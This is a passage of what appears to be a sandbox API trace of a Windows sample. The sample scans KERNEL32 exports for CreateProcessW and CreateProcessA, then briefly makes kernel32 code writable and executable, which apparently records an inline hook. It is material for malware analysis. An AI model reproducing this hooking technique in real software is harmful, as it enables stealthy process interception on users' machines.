(lpString1="BuildCommDCBAndTimeoutsW", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BuildCommDCBW", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CallNamedPipeA", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CallNamedPipeW", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CallbackMayRunLong", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CalloutOnFiberStack", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CancelDeviceWakeupRequest", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CancelIo", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CancelIoEx", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CancelSynchronousIo", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CancelThreadpoolIo", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CancelTimerQueueTimer", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CancelWaitableTimer", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CeipIsOptedIn", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="ChangeTimerQueueTimer", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CheckAllowDecryptedRemoteDestinationPolicy", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CheckElevation", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CheckElevationEnabled", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CheckForReadOnlyResource", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CheckForReadOnlyResourceFilter", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3A", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3W", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="CheckRemoteDebuggerPresent", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CheckTokenCapability", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CheckTokenMembershipEx", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ClearCommBreak", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ClearCommError", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseConsoleHandle", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseHandle", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ClosePackageInfo", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ClosePrivateNamespace", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseProfileUserMapping", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseState", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseThreadpool", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseThreadpoolCleanupGroup", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseThreadpoolCleanupGroupMembers", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseThreadpoolIo", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseThreadpoolTimer", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseThreadpoolWait", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CloseThreadpoolWork", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CmdBatNotification", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CommConfigDialogA", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CommConfigDialogW", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CompareCalendarDates", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CompareFileTime", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CompareStringA", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CompareStringEx", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CompareStringOrdinal", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CompareStringW", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ConnectNamedPipe", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ConsoleMenuControl", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ContinueDebugEvent", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ConvertCalDateTimeToSystemTime", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ConvertDefaultLocale", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ConvertFiberToThread", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ConvertSystemTimeToCalDateTime", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ConvertThreadToFiber", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="ConvertThreadToFiberEx", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CopyContext", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CopyFile2", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CopyFileA", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CopyFileExA", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CopyFileExW", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CopyFileTransactedA", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CopyFileTransactedW", lpString2="CreateProcessW") returned -1 [0207.973] lstrcmpA (lpString1="CopyFileW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CopyLZFile", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateActCtxA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateActCtxW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateActCtxWWorker", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateBoundaryDescriptorA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateBoundaryDescriptorW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateConsoleScreenBuffer", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateDirectoryA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateDirectoryExA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateDirectoryExW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateDirectoryTransactedA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateDirectoryTransactedW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateDirectoryW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateEventA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateEventExA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateEventExW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateEventW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFiber", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFiberEx", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFile2", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFileA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFileMappingA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFileMappingFromApp", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFileMappingNumaA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFileMappingNumaW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFileMappingW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFileTransactedA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFileTransactedW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateFileW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateHardLinkA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateHardLinkTransactedA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateHardLinkTransactedW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateHardLinkW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateIoCompletionPort", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateJobObjectA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateJobObjectW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateJobSet", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateMailslotA", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateMailslotW", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateMemoryResourceNotification", lpString2="CreateProcessW") returned -1 [0207.974] lstrcmpA (lpString1="CreateMutexA", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateMutexExA", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateMutexExW", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateMutexW", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateNamedPipeA", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateNamedPipeW", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreatePipe", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreatePrivateNamespaceA", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreatePrivateNamespaceW", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateProcessA", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateProcessAsUserW", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateProcessInternalA", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateProcessInternalW", lpString2="CreateProcessW") returned -1 [0207.975] lstrcmpA (lpString1="CreateProcessW", lpString2="CreateProcessW") returned 0 [0207.975] VirtualProtect (in: lpAddress=0x7ff977b3b780, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0xb0938cf8c8 | out: lpflOldProtect=0xb0938cf8c8*=0x2) returned 1 [0207.975] VirtualProtect (in: lpAddress=0x7ff977b23a00, dwSize=0xe, flNewProtect=0x40, lpflOldProtect=0xb0938cf8c0 | out: lpflOldProtect=0xb0938cf8c0*=0x20) returned 1 [0207.975] VirtualProtect (in: lpAddress=0x7ff977b23a00, dwSize=0xe, flNewProtect=0x20, lpflOldProtect=0xb0938cf8c0 | out: lpflOldProtect=0xb0938cf8c0*=0x40) returned 1 [0207.975] VirtualProtect (in: lpAddress=0x7ff977b3b780, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0xb0938cf8c8 | out: lpflOldProtect=0xb0938cf8c8*=0x40) returned 1 [0207.976] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf860, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf860, ReturnLength=0x0) returned 0x0 [0207.976] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0207.976] lstrcmpA (lpString1="AcquireSRWLockExclusive", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AcquireSRWLockShared", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="ActivateActCtx", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddAtomA", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddAtomW", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddDllDirectory", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddRefActCtx", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddVectoredContinueHandler", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AddVectoredExceptionHandler", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AllocConsole", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AppXGetOSMaxVersionTested", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="ApplicationRecoveryFinished", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="ApplicationRecoveryInProgress", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AreFileApisANSI", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AssignProcessToJobObject", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="AttachConsole", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="BackupRead", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="BackupSeek", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="BackupWrite", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="BaseCheckAppcompatCache", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="BaseCheckAppcompatCacheEx", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="BaseCheckAppcompatCacheExWorker", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="BaseCheckAppcompatCacheWorker", lpString2="CreateProcessA") returned -1 [0207.976] lstrcmpA (lpString1="BaseCheckElevation", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupport", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupportWorker", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseDestroyVDMEnvironment", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseDllReadWriteIniFile", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseDumpAppcompatCache", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseDumpAppcompatCacheWorker", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseElevationPostProcessing", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseFlushAppcompatCache", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseFlushAppcompatCacheWorker", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseFormatObjectAttributes", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseFormatTimeOut", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseFreeAppCompatDataForProcessWorker", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseGenerateAppCompatData", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseGetNamedObjectDirectory", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseInitAppcompatCacheSupport", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseInitAppcompatCacheSupportWorker", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabled", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabledWorker", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseIsDosApplication", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseQueryModuleData", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseReadAppCompatDataForProcessWorker", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseSetLastNTError", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseThreadInitThunk", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseUpdateAppcompatCache", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseUpdateAppcompatCacheWorker", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseUpdateVDMEntry", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseVerifyUnicodeString", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BaseWriteErrorElevationRequiredEvent", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="Basep8BitStringToDynamicUnicodeString", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepAllocateActivationContextActivationBlock", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepAnsiStringToDynamicUnicodeString", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepAppContainerEnvironmentExtension", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepAppXExtension", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepCheckAppCompat", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepCheckWebBladeHashes", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepCheckWinSaferRestrictions", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepConstructSxsCreateProcessMessage", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepCopyEncryption", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepFreeActivationContextActivationBlock", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepFreeAppCompatData", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepGetAppCompatData", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepGetComputerNameFromNtPath", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepGetExeArchType", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepIsProcessAllowed", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepMapModuleHandle", lpString2="CreateProcessA") returned -1 [0207.977] lstrcmpA (lpString1="BasepNotifyLoadStringResource", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BasepPostSuccessAppXExtension", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BasepProcessInvalidImage", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BasepQueryAppCompat", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BasepReleaseAppXContext", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BasepReleaseSxsCreateProcessUtilityStruct", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BasepReportFault", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BasepSetFileEncryptionCompression", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="Beep", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BeginUpdateResourceA", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BeginUpdateResourceW", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BindIoCompletionCallback", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BuildCommDCBA", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsA", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsW", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="BuildCommDCBW", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CallNamedPipeA", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CallNamedPipeW", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CallbackMayRunLong", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CalloutOnFiberStack", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CancelDeviceWakeupRequest", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CancelIo", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CancelIoEx", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CancelSynchronousIo", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CancelThreadpoolIo", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CancelTimerQueueTimer", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CancelWaitableTimer", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CeipIsOptedIn", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="ChangeTimerQueueTimer", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CheckAllowDecryptedRemoteDestinationPolicy", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CheckElevation", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CheckElevationEnabled", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CheckForReadOnlyResource", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CheckForReadOnlyResourceFilter", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3A", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3W", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CheckRemoteDebuggerPresent", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CheckTokenCapability", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CheckTokenMembershipEx", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="ClearCommBreak", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="ClearCommError", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CloseConsoleHandle", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CloseHandle", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="ClosePackageInfo", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="ClosePrivateNamespace", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CloseProfileUserMapping", lpString2="CreateProcessA") returned -1 [0207.978] lstrcmpA (lpString1="CloseState", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CloseThreadpool", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CloseThreadpoolCleanupGroup", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CloseThreadpoolCleanupGroupMembers", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CloseThreadpoolIo", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CloseThreadpoolTimer", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CloseThreadpoolWait", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CloseThreadpoolWork", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CmdBatNotification", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CommConfigDialogA", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CommConfigDialogW", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CompareCalendarDates", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CompareFileTime", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CompareStringA", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CompareStringEx", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CompareStringOrdinal", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CompareStringW", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="ConnectNamedPipe", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="ConsoleMenuControl", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="ContinueDebugEvent", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="ConvertCalDateTimeToSystemTime", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="ConvertDefaultLocale", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="ConvertFiberToThread", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="ConvertSystemTimeToCalDateTime", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="ConvertThreadToFiber", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="ConvertThreadToFiberEx", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CopyContext", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CopyFile2", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CopyFileA", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CopyFileExA", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CopyFileExW", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CopyFileTransactedA", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CopyFileTransactedW", lpString2="CreateProcessA") returned -1 [0207.979] lstrcmpA (lpString1="CopyFileW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CopyLZFile", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateActCtxA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateActCtxW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateActCtxWWorker", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateBoundaryDescriptorA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateBoundaryDescriptorW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateConsoleScreenBuffer", 